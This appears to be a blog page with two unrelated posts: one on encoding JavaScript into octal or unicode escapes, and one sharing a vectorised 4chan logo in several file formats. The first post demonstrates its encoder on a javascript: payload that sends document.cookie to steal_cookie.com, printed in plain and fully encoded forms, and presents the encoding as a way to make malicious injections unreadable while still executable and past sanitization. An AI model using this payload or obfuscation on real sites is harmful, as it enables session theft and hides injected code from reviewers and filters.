JavaScript Character Encoding As Spoofing, Or Malicious Injections That Are 100% executable, But Totally Unreadable

function string_to_octal(string){
  return string.replace(/./g, function(char, index, whole){
    return 256 > char.charCodeAt(0) ? "\\" + ('0' + char.charCodeAt(0).toString(8)).slice(-3) : unicode_to_string(char);
  });
}
function string_to_unicode(string){
  return string.replace(/./g, function(char, index, whole){
    return "\\u" + ('0000' + char.charCodeAt(0).toString(16)).slice(-4);
  });
}
function unicode_to_string(string){
  return string.replace(/[\u0000-\uffff]/g, function(char, index, whole){
    return String.fromCharCode(char.charCodeAt(0).toString(10));
  });
}

test it..
for javascript:(function(){var img = new Image(); img.src="https://steal_cookie.com?cookie=" + encodeURIComponent(document.cookie); return true;}());

either the “prefer octal over unicode”: "\152\141\166\141\163\143\162\151\160\164\072\050\146\165\156\143\164\151\157\156\050\051\173\166\141\162\040\151\155\147\040\075\040\156\145\167\040\111\155\141\147\145\050\051\073\040\151\155\147\056\163\162\143\075\042\150\164\164\160\163\072\057\057\163\164\145\141\154\137\143\157\157\153\151\145\056\143\157\155\077\143\157\157\153\151\145\075\042\040\053\040\145\156\143\157\144\145\125\122\111\103\157\155\160\157\156\145\156\164\050\144\157\143\165\155\145\156\164\056\143\157\157\153\151\145\051\073\040\162\145\164\165\162\156\040\164\162\165\145\073\175\050\051\051\073" (which most of ASCII based code will work quite unify with..)
or just “100% unicode encoding”: "\u006a\u0061\u0076\u0061\u0073\u0063\u0072\u0069\u0070\u0074\u003a\u0028\u0066\u0075\u006e\u0063\u0074\u0069\u006f\u006e\u0028\u0029\u007b\u0076\u0061\u0072\u0020\u0069\u006d\u0067\u0020\u003d\u0020\u006e\u0065\u0077\u0020\u0049\u006d\u0061\u0067\u0065\u0028\u0029\u003b\u0020\u0069\u006d\u0067\u002e\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u0073\u003a\u002f\u002f\u0073\u0074\u0065\u0061\u006c\u005f\u0063\u006f\u006f\u006b\u0069\u0065\u002e\u0063\u006f\u006d\u003f\u0063\u006f\u006f\u006b\u0069\u0065\u003d\u0022\u0020\u002b\u0020\u0065\u006e\u0063\u006f\u0064\u0065\u0055\u0052\u0049\u0043\u006f\u006d\u0070\u006f\u006e\u0065\u006e\u0074\u0028\u0064\u006f\u0063\u0075\u006d\u0065\u006e\u0074\u002e\u0063\u006f\u006f\u006b\u0069\u0065\u0029\u003b\u0020\u0072\u0065\u0074\u0075\u0072\u006e\u0020\u0074\u0072\u0075\u0065\u003b\u007d\u0028\u0029\u0029\u003b"

running the following will have same meaning, and it will not actual needed to be translated back, it is totally 100% executable code, but (naturally) a bit more hard to read..
but it DOES sanitize successfully since the character encoding does not differentiate any of the char meaning (other then escaped string – string manipulation).

the idea is that you do not need any conversion-matrix tables, or encrypt/decrypt methods (or any intermediate over just evaluating the string).

4Chan Logo Vectorised

I was created some artist rendering of the old 4chan logo and pass it through to a clean vector graphic (all available formats..).
I’ve thought it might be useful for anyone else too… so I’m sharing it here….

but first…

here is an ICON file (32bit with alpha transparency and with 256 colors too, all formats from 256×256 down to-> 16×16)
4chan_logo_vectorised_32_256

here is the seed I’ve used (256×256 PNG, 32bit with alpha transparency)
4chan_logo_vectorised_32_256

and the vector graphic ones:
4chan_logo_vectorised.ai
4chan_logo_vectorised.svg
4chan_logo_vectorised.pdf
4chan_logo_vectorised.eps
4chan_logo_vectorised.emf
4chan_logo_vectorised.dxf